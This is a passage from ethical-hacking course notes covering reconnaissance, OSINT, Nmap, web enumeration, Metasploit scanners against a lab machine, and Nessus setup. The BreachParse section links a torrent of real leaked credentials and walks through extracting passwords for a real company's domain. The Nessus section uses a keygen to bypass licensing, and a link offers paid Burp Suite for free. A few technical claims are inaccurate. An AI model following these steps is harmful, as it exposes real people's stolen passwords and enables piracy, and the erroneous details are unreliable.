Using Rootkits:

Rootkits are malicious tools designed to hide the presence of malware by intercepting calls to the
operating system, making it harder to detect by security software or administrators.

They can hide files, processes, network connections, and even registry entries.

Obfuscation:

53/129
Masking or encoding malicious code (e.g., using polymorphic malware or packing tools) to avoid
detection by signature-based security systems like antivirus.

Using Anti-Forensic Tools:

Tools that prevent forensic analysis, such as wiping disk sectors or manipulating timestamps (e.g.,
metasploit's mspacker can obfuscate payloads).

Disguising Malware:

Changing file names, disguising malware as legitimate files, or hiding them in innocuous-looking
locations (e.g., system directories).

Changing User/Group Permissions:

Altering user or group permissions on sensitive files or directories to hide changes or prevent
detection by admins.

Creating False Evidence:

Sometimes attackers may insert fake evidence into logs or systems to mislead forensic
investigators.

Mitigation:
Regular Log Monitoring: Implementing real-time log monitoring can help detect unusual activities or
tampering.

File Integrity Monitoring: Tools that check file hashes regularly to spot unauthorized changes.

Endpoint Detection and Response (EDR): Solutions that look for signs of evasion techniques and
maintain visibility of critical system activities.

Covering tracks is a critical part of an attacker's strategy to avoid detection, but it also highlights the
need for robust security monitoring and detection systems to identify and prevent it.

14. EHP Identifying our Target

Identifying our Target


Bugcrowd

Bugcrowd is a crowdsourced security platform. It was founded in 2012, and in 2019 it was one of the
largest bug bounty and vulnerability disclosure companies on the internet. Bugcrowd runs bug
bounty programs and also offers a range of penetration testing services it refers to as "Penetration
Testing as a Service" (PTaaS), as well as attack surface management.

Link:
https://www.bugcrowd.com/

The listed companys allow to pentest on bugcrowd. The bugbounty programs will found here.

54/129
Link:
https://bugcrowd.com/programs

HackerOne

HackerOne is a company specializing in cybersecurity, specifically attack resistance management,


which blends the security expertise of ethical hackers with asset discovery, continuous assessment,
and process enhancement to find and close gaps in the digital attack surface.

It was one of the first companies to embrace and utilize crowd-sourced security and cybersecurity
researchers as linchpins of its business model; pioneering bug bounty and coordinated vulnerability
disclosure.

As of December 2022, HackerOne's network had paid over $230 million in bounties. HackerOne's
customers include The U.S. Department of Defense, General Motors, GitHub, Goldman Sachs,
Google, Hyatt, Lufthansa, Microsoft, MINDEF Singapore, Nintendo, PayPal, Slack, Twitter, and Yahoo.

Link:
https://www.hackerone.com/

The listed companys allow to pentest on hackerone. The bugbounty programs will found here.

Link:
https://hackerone.com/bug-bounty-programs

Rules to follow
1. Read the Guidelines for the programs
2. Provide details of the vulnerability, including information needed to reproduce and validate the
vulnerability and a Proof of Concept (POC)

Scope and rewards

In scope targets
In scope targets means what can do

Out of scope targets


Out of scope targets means what not to do

15. EHP Gathering Breached Credentials with


BreachParse

Gathering Breached Credentials with BreachParse

Breach-parse:

55/129
A tool for parsing breached passwords. It refers to a tool or process that analyzes data logs or events
associated with a security breach to extract meaningful insights or patterns (e.g., identifying the
source of the breach, how it occurred, what was affected).

Breach-parse Link
https://github.com/Byte-Capsule-Ltd/breach-parse
https://github.com/hmaverickadams/breach-parse

Download breached password list from magnet located here:

magnet:?xt=urn:btih:
7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftrack
er.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-
paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fgl
otorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337

Step 1:
First Install qbittorrent if not install
Add the magnet link to qbittorrent

Note: The file will take more then 40gb.

Step 2:

Go to the download location


>> cd /home/kali/Downloads

Move or Copy file to the opt directory


>> sudo mv -f breach-parse /opt OR >> sudo cp -r breach-parse /opt (To copy it will need 100gb on
disk)

Now go to root
>> sudo su

Go to this path
# cd /opt/breach-parse

Give the file permission


# chmod +rwx breach-parse.sh

Now run the command


# ./breach-parse.sh @tesla.com tesla.txt

56/129
Note: It will take some time.

It will extract some files in /opt/breach-parse

57/129
BreachCompilation tesla-master.txt tesla-users.txt
breach-parse.sh tesla-passwords.txt

Now see the file content


>> cat tesla-master.txt

58/129
To see with line number use this

>> cat -n tesla-master.txt

59/129
That's it.

16. EHP Hunting Breached Credentials with


DeHashed

Hunting Breached Credentials with DeHashed

Dehashed (Paid tool)


https://dehashed.com/

DeHashed provides free deep-web scans and protection against credential leaks. A modern personal
asset search engine created for security analysts, journalists, security companies, and everyday
people to help secure accounts.

60/129
Gather information from breach data

Have I Been Pwned


https://haveibeenpwned.com/

Have I Been Pwned allows you to search across multiple data breaches to see if your email address
or phone number has been compromised.

Search engine of Internet-connected devices. Create a free account to get started.

Shodan
https://www.shodan.io/

Shodan Search Engine


Search engine of Internet-connected devices. Create a free account to get started (use protonmail).

Shodan is a search engine that lets users search for various types of servers (webcams, routers,
servers, etc.) connected to the internet using a variety of filters.

[1] Some have also described it as a search engine of service banners, which is metadata that the
server sends back to the client.

[2] This can be information about the server software, what options the service supports, a welcome
message or anything else that the client can find out before interacting with the server.

Hunter
https://hunter.io/

Find email addresses and send cold emails. Hunter is the leading solution to find and verify
professional email addresses. Start using Hunter and connect with the people that matter for your
business.

Similar tools:

1. https://www.criminalip.io/en
2. https://search.censys.io/
3. https://www.zoomeye.hk/
4. https://ivre.rocks/
5. https://en.fofa.info/
6. https://wapiti-scanner.github.io/
7. https://weleakinfo.io/
8. https://www.onyphe.io/pricing#freemium
9. https://hunter.how/

17. EHP Hunting Subdomains Part 1


61/129
Hunting Subdomains Part 1
Subdomain Finding Tools

1. sublist3r (sudo apt install sublis3r)

To see the user manual for sublist3r


>> sublis3r -h

2. crt.sh (website)

For search use this


>> %.example.com

Extra link for subdomain finder


https://subdomainfinder.c99.nl/

18. EHP Hunting Subdomains Part 2

Hunting Subdomains Part 2


Continue from 17. EHP Hunting Subdomains Part 1

3. subfinder

Link:
https://github.com/projectdiscovery/subfinder

>> subfinder -d example.com

To limit subdomain find use this

>> subfinder -d example.com -t (number as need)


example:
subfinder -d example.com -t 10

4. owasp amass

Link:
https://github.com/owasp-amass/amass

5. Tomnomnom
To check subdomains are live or not

Link:
https://github.com/tomnomnom/httprobe

62/129
19. EHP Identifying Website Technologies

Identifying Website Technologies


BuiltWith

BuiltWith tracks over 2500 eCommerce technologies across over 26 million eCommerce websites
backed with extensive exportable attributes including spend, revenue, employee count, social media
count, industry, location, rank and many more.

Link:
https://builtwith.com

Wappalyzer

Find out the technology stack of any website. Create lists of websites and contacts by the
technologies they use.

Link:
https://www.wappalyzer.com

Firefox Add-Ons Link


https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

Chrome extensions Link


https://chromewebstore.google.com/detail/wappalyzer-technology-pro/
gppongmhjkpfnbhagpmjfkannfbllamg

Whatweb
Whatweb is a kali Linux tool. It is preinstalled on the os.

Command

>> whatweb example.com

20. EHP Information Gathering with Burp Suite

Information Gathering with Burp Suite


Information gathering is a crucial phase in penetration testing, and Burp Suite provides powerful
tools for this process.

63/129
1. https://portswigger.net/web-security/all-topics
2. https://www.vaadata.com/blog/introduction-to-burp-suite-the-tool-dedicated-to-web-application-
security/
3. https://dataspaceacademy.com/blog/burp-suite-overview-features-tools-and-benefits
4. https://tcm-sec.com/burp-suite-macros-a-hands-on-guide/
5. https://www.youtube.com/watch?v=slxHpp7ilYU
6. https://en.wikipedia.org/wiki/Burp_Suite

More about Burp

3. https://tcm-sec.com/burp-extension-development-part-1-setup-basics/
4. https://tcm-sec.com/burp-extension-dev-part-4-gui-design/

Install BURP SUITE Professional on LINUX for FREE


https://medium.com/@zisansakibhaque/install-burp-suite-professional-on-linux-for-free-
bccc6c6dfdf1

Week 5

21. EHP Google Fu

Google Fu
Google Fu refers to the art of crafting advanced search queries to uncover specific information on
the internet. In the context of ethical hacking, Google Fu is used to identify vulnerabilities, gather
intelligence, and aid in penetration testing. Here are some key concepts and techniques:

Advanced Search Operators

Filetype: Search for specific file types (e.g., filetype:pdf for PDF files).

Inurl: Search for keywords within URLs (e.g., inurl:login for pages with “login” in the URL).

Intext: Search for keywords within page content (e.g., intext:"password" for pages containing the
word “password”).

Intitle: Search for keywords in page titles (e.g., intitle:"index of" for directory listings).
Link: Search for pages linking to a specific URL (e.g., link:http://example.com).

Google Hacking Techniques

Vulnerability identification: Use search queries to identify vulnerable versions of software,


plugins, or modules.

64/129
Information gathering: Search for sensitive information, such as credentials, configuration files, or
error messages.

Directory listing: Use intitle:"index of" to find directory listings, which can reveal file structures and
potential vulnerabilities.

File discovery: Search for specific file types (e.g., filetype:sql) or use inurl to find files with specific
names.

Best Practices

Use quotes: Enclose search terms in quotes to search for exact phrases.

Use the site operator: Limit searches to specific websites using the site: operator (e.g.,
site:example.com).

Use the OR operator: Combine search terms using the OR operator (e.g., password OR
credentials).

Be cautious: Avoid using Google Fu for malicious purposes, as it can be used to identify and exploit
vulnerabilities.

Tools and Resources

Google Advanced Search: Explore Google’s built-in advanced search features and operators.

Google Dorking Database: Access a comprehensive database of Google hacking queries and
examples.

Acunetix Web Vulnerability Scanner: Utilize an automated web vulnerability scanner to identify
and prioritize vulnerabilities.

Ethical Considerations

Obtain permission: Ensure you have permission to conduct Google Fu searches and testing on the
targeted systems.

Respect privacy: Avoid searching for sensitive information or targeting systems without explicit
permission.

Report findings: Document and report any identified vulnerabilities or issues to the system owners
or administrators.

By mastering Google Fu and adhering to ethical guidelines, ethical hackers can leverage these
advanced search techniques to aid in penetration testing, vulnerability identification, and
information gathering, ultimately improving the security and resilience of targeted systems.

Google Dorks

65/129
Link:
https://dorksearch.com/
https://dorkgenius.com/

Google Dorks for Bug Bounty

Link:
https://taksec.github.io/google-dorks-bug-bounty/
https://x.com/TakSec

22. EHP Utilizing Social Media

Utilizing Social Media


Social Media for Ethical Hacking

Social media plays a crucial role in ethical hacking’s information gathering phase. Ethical hackers
leverage social media platforms to gather valuable insights about their targets, including:

Employee profiles: Hackers can identify employees, their roles, and connections, which helps in
understanding the organization’s structure and potential attack vectors.

Company information: Social media platforms often provide publicly available information about a
company, such as its products, services, and mission statements.

Network and system details: Hackers can gather information about a company’s network
infrastructure, including IP addresses, subdomains, and open ports.

Employee behavior: Observing employee behavior on social media can help hackers identify
potential vulnerabilities, such as weak passwords or phishing susceptibility.

Company culture: Social media can provide insights into a company’s culture, including its values,
policies, and security practices.

Tools and Techniques

Several tools and techniques are used to gather information from social media platforms:

Recon-ng: A web reconnaissance framework that extracts information from social media platforms,
online databases, and web sources.

SpiderFoot: An open-source OSINT automation tool that collects information from various sources,
including social media, DNS, WHOIS, and threat intelligence feeds.

66/129
Google Fu: A search engine optimization (SEO) technique used to gather information from publicly
available sources, including social media profiles and company websites.

Best Practices

When utilizing social media for information gathering in ethical hacking, it’s essential to:

Respect privacy: Only gather publicly available information and avoid accessing private profiles or
data without explicit permission.

Use automated tools responsibly: Ensure that automated tools are configured to respect privacy
settings and avoid overwhelming social media platforms with requests.

Document findings: Keep detailed records of gathered information to facilitate analysis and
reporting.

Maintain ethical boundaries: Avoid using gathered information for malicious purposes and
prioritize the ethical hacking framework’s principles.

By leveraging social media effectively, ethical hackers can gather valuable information about their
targets, improving the accuracy and efficiency of their assessments and ultimately enhancing the
organization’s security posture.

Social Media Information Gathering

Social media has become a valuable tool for gathering information about individuals. This can be
done through various means, including:

1. Publicly Available Information

Social media profiles (e.g., Facebook, Twitter, LinkedIn) often contain publicly available information,
such as:
• Biographical details (name, age, location, occupation)
• Interests and hobbies
• Friends and connections
• Posts and updates (which can provide insights into their thoughts, opinions, and behaviors)

2. Social Listening

Social listening involves monitoring social media conversations about a specific individual,
organization, or topic. This can help gather information on:
• Mentions and references to the person
• Opinions and sentiments expressed about them
• Relevant discussions and topics they participate in

3. Data Collection through APIs and Tools

Many social media platforms provide APIs (Application Programming Interfaces) that allow
developers to access and collect data. Tools like:
• Twitter Streaming API
• Facebook Graph API
• LinkedIn API
67/129
• Social media listening tools (e.g., Hootsuite, Sprout Social)

can be used to collect and analyze data on individuals, including:

+ Profile information
+ Post and update history
+ Engagement metrics (likes, comments, shares)
+ Network and connection data

4. Sentiment Analysis and Opinion Mining

Sentiment analysis and opinion mining involve using algorithms to analyze the tone and sentiment
of social media posts about an individual. This can help identify:
• Positive and negative opinions about the person
• Trends and patterns in public perception
• Potential areas of concern or controversy

5. Contextual Analysis

Contextual analysis involves examining the broader context in which social media conversations
about an individual take place. This can include:
• Identifying influencers and key opinion leaders
• Analyzing the role of hashtags and keywords
• Understanding the impact of events and news on public perception

Ethical Considerations

When gathering information about an individual through social media, it’s essential to consider
ethical implications, such as:
• Respect for privacy and personal boundaries
• Avoiding harassment or targeted attacks
• Ensuring data collection and analysis are transparent and compliant with platform terms and
regulations

Best Practices

To effectively utilize social media for information gathering on a person, follow these best practices:
• Clearly define the purpose and scope of the information gathering
• Use publicly available information and APIs whenever possible
• Respect privacy boundaries and avoid collecting sensitive or personal data
• Analyze and interpret data in a responsible and unbiased manner

By understanding these methods and best practices, you can effectively utilize social media for
information gathering on a person while maintaining ethical standards.

23. EHP OSINT Fundamentals

OSINT Fundamentals
Open-Source Intelligence (OSINT) refers to the collection, analysis, and dissemination of publicly
available information from various sources, including the internet, social media, news articles, and
68/129
other publicly accessible data. OSINT is a crucial component of intelligence gathering, as it provides
valuable insights and information without requiring access to classified or proprietary data.

Key Concepts:

1. Publicly Available Information (PAI): Information that is freely accessible and can be found
through online searches, news articles, and other publicly available sources.

2. Open-Source Intelligence (OSINT): The process of collecting, analyzing, and disseminating PAI
to support intelligence operations, decision-making, and situational awareness.

3. Non-attributional Search: Conducting online searches anonymously to protect privacy and


avoid revealing one’s identity.

4. Information Quality: Evaluating the reliability and credibility of PAI to ensure accurate and
trustworthy insights.

OSINT Techniques:

1. Search Engine Optimization (SEO): Utilizing search engines to their full potential, including
advanced search operators and syntax.

2. Social Media Analysis: Collecting and analyzing data from social media platforms to identify
trends, sentiment, and potential threats.

3. Web Scraping: Extracting data from websites and online sources using specialized tools and
techniques.

4. Historical Research: Gathering and analyzing historical information to identify patterns, trends,
and potential risks.

OSINT Tools:

1. Maltego: A popular OSINT tool for collecting and analyzing data from various sources, including
social media and the dark web.

2. Spiderfoot: A tool for automating OSINT tasks, including search engine queries and web
scraping.

3. Custom Python Tools: Utilizing Python programming language to create custom OSINT tools
and scripts.

Best Practices:

1. Curiosity and Passion: Developing a curiosity-driven approach to OSINT, with a passion for
continuous learning and improvement.

2. Ethical Considerations: Adhering to ethical guidelines when collecting and analyzing PAI,
ensuring responsible and respectful use of publicly available information.

69/129
3. Continuous Training: Staying up-to-date with the latest OSINT techniques, tools, and trends
through ongoing training and professional development.

Real-World Applications:

1. Cyber Threat Intelligence: Identifying and monitoring cyber threats, vulnerabilities, and
incident response efforts using OSINT.

2. Competitive Intelligence: Gathering market research, competitor analysis, and business


intelligence using OSINT.

3. Law Enforcement: Collecting and analyzing information on criminal activities, monitoring


criminal networks, and supporting investigations using OSINT.

4. Government and Intelligence Agencies: Gathering information on potential security threats,


monitoring geopolitical events, and supporting decision-making using OSINT.

By understanding the fundamentals of OSINT, individuals can leverage publicly available


information to support their work, improve decision-making, and stay ahead of emerging threats.

OSINT Fundamentals for Ethical Hacking


Introduction to OSINT Fundamentals: OSINT, or Open-Source Intelligence, is the process of
collecting and analyzing information from publicly available sources to gather intelligence. In the
context of ethical hacking, OSINT is used to gather information about a target organization or
individual, which can be used to identify potential vulnerabilities and weaknesses.

• Importance of OSINT in Ethical Hacking: OSINT is a crucial step in the ethical hacking process,
as it allows hackers to gather information about a target without having to resort to more invasive or
malicious methods. By using OSINT, ethical hackers can identify potential vulnerabilities and
weaknesses, and then use that information to simulate an attack and test the target’s defenses.

• OSINT Techniques and Tools: There are a variety of OSINT techniques and tools available,
including Google Dorking, metadata analysis, and social media analysis. These tools and techniques
can be used to gather information about a target, including their IP address, domain name, and other
relevant details. Some popular OSINT tools include Maltego, Shodan, and TheHarvester.

• Ethical Considerations: When using OSINT for ethical hacking, it’s essential to consider the
ethical implications of gathering and analyzing information from publicly available sources. Ethical
hackers must ensure that they are not violating any laws or regulations, and that they are respecting
the privacy and security of the target organization or individual.

• Best Practices for OSINT in Ethical Hacking: To get the most out of OSINT in ethical hacking,
it’s essential to follow best practices, such as defining clear objectives, using automated tools, and
verifying the accuracy of the information gathered. Additionally, ethical hackers should stay up-to-
date with the latest OSINT tools and techniques, and be aware of the potential risks and limitations of
using OSINT in ethical hacking.

For More

70/129
https://www.youtube.com/watch?v=FS9j131Gq-M

Week 6

24. EHP Scanning with Nmap

Scanning with Nmap

https://nmap.org/book/man-port-scanning-techniques.html

Support Group
"Mastering Nmap: Essential Commands for Network Scanning and Recon for Hacking"

1. Scan a single IP
>> nmap 192.168.1.1
Performs a simple scan on the specified IP address.

2. Scan multiple IPs


>> nmap 192.168.1.1 192.168.1.2 192.168.1.3
Scans the given list of IP addresses.

3. Scan a range of IPs


>> nmap 192.168.1.1-100
Scans IPs from 192.168.1.1 to 192.168.1.100.

4. Detect services and versions


>> nmap -sV 192.168.1.1
Detects open ports and services along with their versions.

5. Aggressive scan with OS detection


>> nmap -A 192.168.1.1
Performs a detailed scan with OS detection, version detection, script scanning, and traceroute.

6. Scan specific ports


>> nmap -p 22,80,443 192.168.1.1
Scans only the specified ports.

7. Scan all 65,535 ports


>> nmap -p- 192.168.1.1
Performs a full port scan.

8. Use default scripts


>> nmap -sC 192.168.1.1
Runs default scripts to gather additional information.

9. Run specific NSE script

71/129
>> nmap --script http-title 192.168.1.1
Runs the http-title script to extract the title of a web page.

10. Run multiple scripts


>> nmap --script http-title,http-headers 192.168.1.1
Runs both the http-title and http-headers scripts.

11. Use a decoy to hide your IP


>> nmap -D RND:10 192.168.1.1
Generates 10 random decoy IPs to obfuscate the scan source.

12. Scan with random port order


>> nmap -r 192.168.1.1
Randomizes the order of scanned ports.

13. Save output in multiple formats


>> nmap -oA scan_results 192.168.1.1
Saves the output in .nmap, .xml, and .gnmap formats.

14. Save output in a plain text file


>> nmap -oN results.txt 192.168.1.1
Saves results in a human-readable text file.

15. Scan an entire subnet


>> nmap 192.168.1.0/24
Scans all devices in the 192.168.1.x subnet.

16. List all live hosts (no port scan)


>> nmap -sn 192.168.1.0/24
Performs a ping scan to list live hosts without scanning ports.

17. Netdiscover
>> netdiscover -i eth0 -r 192.168.1.0/24
performs a ping scan (host discovery) on the local network 192.168.1.0/24. This subnet range
includes IP addresses from 192.168.1.0 to 192.168.1.255.

For more

https://www.youtube.com/playlist?list=PLOSJSv0hbPZAAeHUSEcq5lG6NkIqOGcb4

https://medium.com/@zisansakibhaque/network-scanning-101-c47c655f2d98

25. EHP Enumerating HTTP and HTTPS Part 1

Enumerating HTTP and HTTPS Part 1


Search on search engines about

72/129
what can be done by insecure http method

List all scripts about http

--> ls -al /usr/share/nmap/scripts/ | grep -e "http-"

--> nmap -Pn -sV -P 80 -T4 --script http-methods -script-args http-methods.test=all bytecapsuleit.com
________________________________________
---------------- OUTPUT ----------------
________________________________________
--> nmap -Pn -sV -P 80 -T4 --script http-methods -script-args http-methods.test=all
bytecapsuleit.com

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 10:52 EST


Nmap scan report for 80 (0.0.0.80)
Host is up.
All 1000 scanned ports on 80 (0.0.0.80) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Nmap scan report for bytecapsuleit.com (104.26.4.235)


Host is up (0.085s latency).
Other addresses for bytecapsuleit.com (not scanned): 104.26.5.235 172.67.68.31
2606:4700:20::681a:4eb 2606:4700:20::681a:5eb 2606:4700:20::ac43:441f
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
8080/tcp open http Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8443/tcp open ssl/http Cloudflare http proxy
|_http-server-header: cloudflare

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


Nmap done: 2 IP addresses (2 hosts up) scanned in 76.01 seconds

26. EHP Enumerating HTTP and HTTPS Part 2

Enumerating HTTP and HTTPS Part 2


BruteForce and Hidden file finding

Victim machine will be Metaspoitable 2

73/129
First check victim machine IP

command

>> ip address

To see service version

>> nmap -F -sV -T4 192.168.231.152

74/129
To find hidden file and directories

>> nmap -sV -p 80 --script http-enum 192.168.231.152

75/129
Let's check the /test/ Test page

Let's check the /doc/ files

76/129
Let's check the /phpMyAdmin/

77/129
We see the information. Now it's time to brouteforce. In here we will use Nikto and dirbuster

What is Nikto

Nikto is an open-source web server scanner and vulnerability assessment tool designed to identify
potential security issues in web servers and web applications. It performs comprehensive tests
against web servers, checking for:

1. Outdated software: Nikto checks for outdated versions of web server software, including HTTP
servers, web applications, and other related components.

2. Configuration errors: The tool examines server configuration files and settings for potential
mistakes or security vulnerabilities.

3. Vulnerable files and programs: Nikto scans for known vulnerable files and programs, such as CGI
scripts, PHP files, and other executable code.

4. Server misconfigurations: It checks for incorrect or missing server settings, like HTTP headers,
index files, and server options.

5. SSL/TLS issues: Nikto can also scan for SSL/TLS certificate-related security issues, including cipher
suite weaknesses and certificate expiration dates.

Nikto’s output includes a detailed report listing the identified issues, along with recommendations for
remediation. This information helps security professionals, system administrators, and penetration
testers to:

78/129
• Identify and prioritize security vulnerabilities
• Remediate issues to improve web server security
• Conduct thorough security assessments and audits

Nikto is a command-line interface (CLI) tool, available for Linux, Windows, and macOS platforms. Its
flexibility and customizability make it a popular choice among security professionals and web
developers.

nikto -h means the host. It specifies the target web server’s IP address or hostname to be scanned by
Nikto.

command

>> nikto -h 192.168.231.152

What is dirbuster

DirBuster: A multi-threaded Java application designed to brute-force directories and files names on
web/application servers. Its primary goal is to find hidden files and directories on web servers, often
overlooked in default installations.

Here’s a breakdown of DirBuster’s features:

79/129
1. List-based brute force: DirBuster comes with 9 pre-generated lists of common directory and file
names, crawled from the internet and compiled based on actual usage by developers. This approach
makes it effective at finding hidden files and directories.

2. Pure brute force: Additionally, DirBuster offers a pure brute-force option, allowing users to specify
a custom wordlist or perform a blind brute-force attack.

3. Multi-threading: DirBuster utilizes multi-threading, enabling it to send multiple requests


concurrently and speed up the scanning process.

4. Options: Users can customize DirBuster’s behavior by specifying options such as:

• Target URL
• Wordlist (default or custom)
• GET or HEAD request method
• Thread count
• Start point of the scan
• Verbose output
• File extension filtering
• Recursive scanning
• Report file output

DirBuster is a powerful tool for web penetration testers and security researchers, helping them
discover hidden files and directories on web servers. Its effectiveness relies on the quality of its pre-
generated lists and the user’s ability to customize its behavior to suit their specific needs.

To start DirBuster

>> dirbuster

Target Url
http://192.168.231.152:80/

Go to

• click on (Browse)
• from Look in select (/)
• then select (usr)
• then select (share)
• then find (wordlists)
• then select (dirbuster)
• then choose as your need

80/129
81/129
Results - List View

Results - Tree View

82/129
83/129
84/129
85/129
27. EHP Enumerating SMB

Enumerating SMB
SMB stands for Server Message Block, a protocol used for sharing files, printers, and other resources
over a network. It's widely used in Windows environments but is also supported by other operating
systems like Linux and macOS.

Key Features of SMB:

1. File Sharing: Allows users to access, read, and write files on remote servers as if they were on the
local machine.

2. Printer Sharing: Enables shared access to printers over a network.

3. Network Browsing: Provides the ability to discover and access resources available on a network.

4. Authentication and Permissions: Ensures secure access by requiring users to authenticate and
restricting access based on permissions.

Common Uses:

• Accessing shared folders in office or home networks.


• Connecting to network-attached storage (NAS) devices.
• Enabling communication between Windows and non-Windows systems.

SMB Versions:

1. SMB 1.0: The original version, now outdated and considered insecure.
2. SMB 2.0: Introduced in Windows Vista and Server 2008, offering improved performance and
security.
3. SMB 3.0 and newer: Enhanced with encryption, performance improvements, and failover support.
Common in modern Windows systems.

Tools for Using SMB:

• Windows Explorer: Direct access via \\servername\sharename


• Linux: Use tools like smbclient or mount shares via cifs
• macOS: Connect via Finder with smb://

Metasploit framework

Metasploit is a powerful open-source penetration testing framework used to discover, exploit, and
validate vulnerabilities in systems. It provides tools for creating and executing exploit code, as well
as for simulating real-world attacks to test system security.

Key Features:

86/129
• Exploitation: Helps find and exploit vulnerabilities in networks and applications.
• Payloads: Delivers scripts (like Meterpreter) to interact with or control compromised systems.
• Modules: Includes exploits, auxiliary tools (e.g., for scanning), and post-exploitation tools.
• Automation: Enables scripting and repeatable testing processes.
• Community Contributions: Regularly updated with new exploits and features.

Metasploit is popular among ethical hackers, security researchers, and even malicious actors,
making it essential to learn for cybersecurity professionals.

Following the class

Start Metasploit framework

>> msfconsole

87/129
Now in msfconsole

msf6 > search smb

88/129
We need scanning

224 auxiliary/scanner/smb/smb_ms17_010

89/129
Now select auxiliary/scanner/smb/smb_ms17_010
Which is in 224 number

To select auxiliary/scanner/smb/smb_ms17_010

Command

msf6 > use 224

after selected it will look like the image below

msf6 auxiliary(scanner/smb/smb_ms17_010) >

To check what is in it

msf6 auxiliary(scanner/smb/smb_ms17_010) > info

90/129
Now set RHOSTS (Remote Host)

command

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.231.152

now check the remote host is vulnerable or not

command

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

We did not find any vulnerability here so exit from here.

91/129
Now try smbclient to find vulnerability.

To start smbclient

command

>> smbclient

To see smbclient options

command

>> smbclient --help

To check host

command

>> smbclient -L \\\\192.168.231.152\\

92/129
Here we will use IPC$ (we can also choose any options)

It will show us what we can do here


smb: \> help

93/129
28. EHP Enumerating SSH

Enumerating SSH
Secure Shell (SSH) is a cryptographic network protocol that enables secure remote access to and
management of computers, servers, and other network devices over an unsecured network. It
provides a secure connection by encrypting data and authenticating users, ensuring the
confidentiality and integrity of transmitted data.

Key Features:

• Encryption: SSH encrypts all data transmitted between the client and server, making it difficult
for unauthorized parties to intercept and read or modify the data.

• Authentication: SSH uses strong authentication mechanisms, such as public-key cryptography


and password authentication, to verify the identity of users and devices.

• Port forwarding: SSH allows for tunneling or port forwarding, enabling data packets to traverse
networks that would otherwise block them.

• Secure remote access: SSH enables administrators to access and manage remote devices,
servers, and networks securely, without exposing sensitive data to unauthorized parties.

Common Uses:

1. Remote server management


2. File transfer (securely replacing insecure protocols like FTP)
3. Network administration and maintenance
4. Secure access to cloud-based services and infrastructure

Port Number: SSH typically uses port 22, but this can be changed during configuration.

Enumerating SSH

First start Metaspoitable

>> msfconsole

94/129
In metasploit search for ssh

msf > search type:auxiliary name:ssh

Here we will use this

95/129
now select Number 15

msf > use 15

Now we need to set RHOST. Before do it we need to check it

To check it

msf auxiliary (scaner/ssh/ssh_version) >> info

96/129
In here RHOSTS is not set. RPORT is set which is 22

Now set RHOSTS

msf auxiliary (scaner/ssh/ssh_version) >> set RHOSTS 192.168.231.152

Now check the options

msf auxiliary (scaner/ssh/ssh_version) >> show options

97/129
Now run the module to see the information we get

98/129
Video time 05:53

29. EHP Researching Potential Vulnerabilities

Researching Potential Vulnerabilities

Week 07

99/129
30. EHP Scanning with Nessus Part 1

Scanning with Nessus Part 1


Step-1
Download the nessuss
https://www.tenable.com/downloads/nessus

Install it
>> dpkg -i Nessus-10.8.3-debian10_amd64.deb

Step-2
Go to for more info
https://github.com/harshdhamaniya/nessuskeygen

Step-3

Stop Nessus:
>> systemctl stop nessusd

>> git clone https://github.com/harshdhamaniya/nessuskeygen.git

>> cd nessuskeygen

>> python3 nessuslicense.py

Now chose the Nessus verstion as need

Copy the activation code and use it. (It will valid for 5 days)

Step-4
Updating the Nessus Key

To update the Nessus key, you can use the following commands:

>> nessuscli fix --reset-all (for first time no need to run this command)
>> /opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx

